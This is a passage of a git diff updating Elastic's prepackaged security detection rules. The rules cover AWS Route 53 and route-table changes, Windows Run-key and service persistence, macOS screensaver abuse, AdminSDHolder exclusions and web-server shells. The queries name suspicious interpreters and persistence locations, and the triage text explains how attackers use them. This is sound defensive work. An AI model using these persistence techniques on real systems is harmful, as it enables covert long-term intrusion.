integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:route53.amazonaws.com and event.action:DisableDomainTransferLock and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "12051077-0124-4394-9522-8f4f4db1d674", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -61,5 +91,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transferred_to_another_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transferred_to_another_account.json index 8485e1a96e685..00c219ecd298d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transferred_to_another_account.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transferred_to_another_account.json @@ -16,13 +16,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Route 53 Domain Transferred to Another Account", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:route53.amazonaws.com and event.action:TransferDomainToAnotherAwsAccount and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "2045567e-b0af-444a-8c0b-0b6e2dae9e13", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -60,5 +90,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_hosted_zone_associated_with_a_vpc.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_hosted_zone_associated_with_a_vpc.json index 93b8da585c9ff..4f1041ef2a441 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_hosted_zone_associated_with_a_vpc.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_hosted_zone_associated_with_a_vpc.json @@ -15,13 +15,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Route53 private hosted zone associated with a VPC", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:route53.amazonaws.com and event.action:AssociateVPCWithHostedZone and \nevent.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:route53.amazonaws.com and event.action:AssociateVPCWithHostedZone and\nevent.outcome:success\n", "references": [ "https://docs.aws.amazon.com/Route53/latest/APIReference/API_AssociateVPCWithHostedZone.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e3c27562-709a-42bd-82f2-3ed926cced19", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_created.json index c9127d73cae7a..09616447f80ca 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_created.json @@ -16,15 +16,45 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Route Table Created", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:(CreateRoute or CreateRouteTable) and \nevent.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:(CreateRoute or CreateRouteTable) and\nevent.outcome:success\n", "references": [ "https://docs.datadoghq.com/security_platform/default_rules/aws-ec2-route-table-modified/", "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateRoute.html", "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateRouteTable" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e12c0318-99b1-44f2-830c-3a38a43207ca", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -32,7 +62,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Network Security" + "Network Security", + "Persistence" ], "threat": [ { @@ -47,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_modified_or_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_modified_or_deleted.json index c7acbed8da482..3fd0b12476ed9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_modified_or_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_modified_or_deleted.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Route Table Modified or Deleted", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:(ReplaceRoute or ReplaceRouteTableAssociation or\nDeleteRouteTable or DeleteRoute or DisassociateRouteTable) and event.outcome:success\n", "references": [ "https://github.com/easttimor/aws-incident-response#network-routing", @@ -27,8 +27,38 @@ "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteRoute.html", "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisassociateRouteTable.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e7cd5982-17c8-4959-874c-633acde7d426", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -36,7 +66,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Network Security" + "Network Security", + "Persistence" ], "threat": [ { @@ -51,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_run_key_and_startup_broad.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_run_key_and_startup_broad.json index 6e1705cda69dc..817f1c010fa30 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_run_key_and_startup_broad.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_run_key_and_startup_broad.json @@ -11,6 +11,38 @@ "license": "Elastic License v2", "name": "Startup or Run Key Registry Modification", "query": "registry where registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\", \n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\", \n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\", \n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\", \n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\", \n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\", \n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\", \n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (process.name : \"OneDriveSetup.exe\" and\n registry.value : (\"Delete Cached Standalone Update Binary\", \"Delete Cached Update Binary\", \"amd64\", \"Uninstall *\") and\n registry.data.strings : \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\")\n", + "required_fields": [ + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "97fc44d3-8dae-4019-ae83-298c3015600f", "severity": "low", @@ -49,5 +81,5 @@ "timeline_title": "Comprehensive Registry Timeline", "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_runtime_run_key_startup_susp_procs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_runtime_run_key_startup_susp_procs.json index 2c5b42fba5fa3..4b9ff210d2bfc 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_runtime_run_key_startup_susp_procs.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_runtime_run_key_startup_susp_procs.json @@ -13,6 +13,43 @@ "license": "Elastic License v2", "name": "Execution of Persistent Suspicious Program", "query": "/* userinit followed by explorer followed by early child process of explorer (unlikely to be launched interactively) within 1m */\nsequence by host.id, user.name with maxspan=1m\n [process where event.type in (\"start\", \"process_started\") and process.name : \"userinit.exe\" and process.parent.name : \"winlogon.exe\"]\n [process where event.type in (\"start\", \"process_started\") and process.name : \"explorer.exe\"]\n [process where event.type in (\"start\", \"process_started\") and process.parent.name : \"explorer.exe\" and\n /* add suspicious programs here */\n process.pe.original_file_name in (\"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"RegAsm.exe\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\") and\n /* add potential suspicious paths here */\n process.args : (\"C:\\\\Users\\\\*\", \"C:\\\\ProgramData\\\\*\", \"C:\\\\Windows\\\\Temp\\\\*\", \"C:\\\\Windows\\\\Tasks\\\\*\", \"C:\\\\PerfLogs\\\\*\", \"C:\\\\Intel\\\\*\")\n ]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e7125cea-9fe1-42a5-9a05-b0792cf86f5a", "severity": "medium", @@ -48,5 +85,5 @@ } ], "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_engine_unexpected_child_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_engine_unexpected_child_process.json index 4177569159cb7..da4a6c0bebc4d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_engine_unexpected_child_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_engine_unexpected_child_process.json @@ -11,14 +11,27 @@ "language": "eql", "license": "Elastic License v2", "name": "Unexpected Child Process of macOS Screensaver Engine", - "note": "## Triage and analysis\n\n- Analyze the descendant processes of the ScreenSaverEngine process for malicious code and suspicious behavior such\nas a download of a payload from a server.\n- Review the installed and activated screensaver on the host. Triage the screensaver (.saver) file that was triggered to\nidentify whether the file is malicious or not.\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n- Analyze the descendant processes of the ScreenSaverEngine process for malicious code and suspicious behavior such\nas a download of a payload from a server.\n- Review the installed and activated screensaver on the host. Triage the screensaver (.saver) file that was triggered to\nidentify whether the file is malicious or not.", "query": "process where event.type == \"start\" and process.parent.name == \"ScreenSaverEngine\"\n", "references": [ "https://posts.specterops.io/saving-your-access-d562bf5bf90b", "https://github.com/D00MFist/PersistentJXA" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "48d7f54d-c29e-4430-93a9-9db6b5892270", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -39,12 +52,19 @@ { "id": "T1546", "name": "Event Triggered Execution", - "reference": "https://attack.mitre.org/techniques/T1546/" + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.002", + "name": "Screensaver", + "reference": "https://attack.mitre.org/techniques/T1546/002/" + } + ] } ] } ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_plist_file_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_plist_file_modification.json index 850014c75a7e7..2cc5f2e166f0c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_plist_file_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_plist_file_modification.json @@ -11,14 +11,37 @@ "language": "eql", "license": "Elastic License v2", "name": "Screensaver Plist File Modified by Unexpected Process", - "note": "## Triage and analysis\n\n- Analyze the plist file modification event to identify whether the change was expected or not\n- Investigate the process that modified the plist file for malicious code or other suspicious behavior\n- Identify if any suspicious or known malicious screensaver (.saver) files were recently written to or modified on the host\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n- Analyze the plist file modification event to identify whether the change was expected or not\n- Investigate the process that modified the plist file for malicious code or other suspicious behavior\n- Identify if any suspicious or known malicious screensaver (.saver) files were recently written to or modified on the host", "query": "file where event.type != \"deletion\" and\n file.name: \"com.apple.screensaver.*.plist\" and\n file.path : (\n \"/Users/*/Library/Preferences/ByHost/*\",\n \"/Library/Managed Preferences/*\",\n \"/System/Library/Preferences/*\"\n ) and\n /* Filter OS processes modifying screensaver plist files */\n not process.executable : (\n \"/usr/sbin/cfprefsd\",\n \"/usr/libexec/xpcproxy\",\n \"/System/Library/CoreServices/ManagedClient.app/Contents/Resources/MCXCompositor\",\n \"/System/Library/CoreServices/ManagedClient.app/Contents/MacOS/ManagedClient\"\n )\n", "references": [ "https://posts.specterops.io/saving-your-access-d562bf5bf90b", "https://github.com/D00MFist/PersistentJXA" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e6e8912f-283f-4d0d-8442-e0dcaf49944b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_sdprop_exclusion_dsheuristics.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_sdprop_exclusion_dsheuristics.json index 3768eeed0e57a..08527201b62f4 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_sdprop_exclusion_dsheuristics.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_sdprop_exclusion_dsheuristics.json @@ -11,14 +11,37 @@ "language": "eql", "license": "Elastic License v2", "name": "AdminSDHolder SDProp Exclusion Added", - "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the\npermissions on any of the protected accounts and groups do not match, it resets the permissions on the protected\naccounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is\nused to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the\n16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n* For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character\nis set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the\nexcluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high\nprivileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). If more than one group is specified, the values will be summed together;\n for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP)\nshould be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the\npermissions on any of the protected accounts and groups do not match, it resets the permissions on the protected\naccounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is\nused to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the\n16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n* For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character\nis set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the\nexcluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high\nprivileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). If more than one group is specified, the values will be summed together;\n for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP)\nshould be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", "references": [ "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad", "https://petri.com/active-directory-security-understanding-adminsdholder-object" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -41,5 +64,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_services_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_services_registry.json index c44e78f95845d..bede213815a05 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_services_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_services_registry.json @@ -11,6 +11,28 @@ "license": "Elastic License v2", "name": "Unusual Persistence via Services Registry", "query": "registry where registry.path : (\"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\", \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\") and\n not registry.data.strings : (\"?:\\\\windows\\\\system32\\\\Drivers\\\\*.sys\",\n \"\\\\SystemRoot\\\\System32\\\\drivers\\\\*.sys\",\n \"\\\\??\\\\?:\\\\Windows\\\\system32\\\\Drivers\\\\*.SYS\",\n \"system32\\\\DRIVERS\\\\USBSTOR\") and\n not (process.name : \"procexp??.exe\" and registry.data.strings : \"?:\\\\*\\\\procexp*.sys\") and\n not process.executable : (\"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\winsxs\\\\*\\\\TiWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\",\n \"?:\\\\Windows\\\\System32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\regsvr32.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "403ef0d3-8259-40c9-a5b6-d48354712e49", "severity": "low", @@ -47,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_activity_by_web_server.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_activity_by_web_server.json index eec7157c74148..60fc7d54b06a4 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_activity_by_web_server.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_activity_by_web_server.json @@ -14,10 +14,32 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Shell via Web Server", - "query": "event.category:process and event.type:(start or process_started) and process.name:(bash or dash) and\n user.name:(apache or nginx or www or \"www-data\")\n", + "query": "event.category:process and event.type:(start or process_started) and\nprocess.name:(bash or dash or ash or zsh or \"python*\" or \"perl*\" or \"php*\") and\nprocess.parent.name:(\"apache\" or \"nginx\" or \"www\" or \"apache2\" or \"httpd\" or \"www-data\")\n", "references": [ "https://pentestlab.blog/tag/web-shell/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": 